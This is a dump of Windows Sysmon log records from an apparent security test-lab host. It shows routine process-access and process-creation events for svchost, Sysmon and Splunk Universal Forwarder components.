07:59:27.686{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F65F-60EB-A979-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808898Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.686{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808897Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:27.686{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808896Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.686{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808895Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:27.686{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808894Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.686{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808893Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:27.686{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808892Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.686{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808891Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:27.686{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808890Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.671{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808889Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:27.671{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F65F-60EB-A979-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808888Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.671{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F65F-60EB-A979-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808887Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.671{0C1E0330-F65F-60EB-A979-00000000D001}2372C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" 
--ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000808886Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:27.140{0C1E0330-F65E-60EB-A879-00000000D001}40763708C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808885Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F65E-60EB-A879-00000000D001}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808884Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808883Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808882Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808881Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808880Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808879Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808878Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808877Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808876Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:59:26.999{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808875Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F65E-60EB-A879-00000000D001}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000808874Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.999{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F65E-60EB-A879-00000000D001}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000808873Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:59:26.985{0C1E0330-F65E-60EB-A879-00000000D001}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 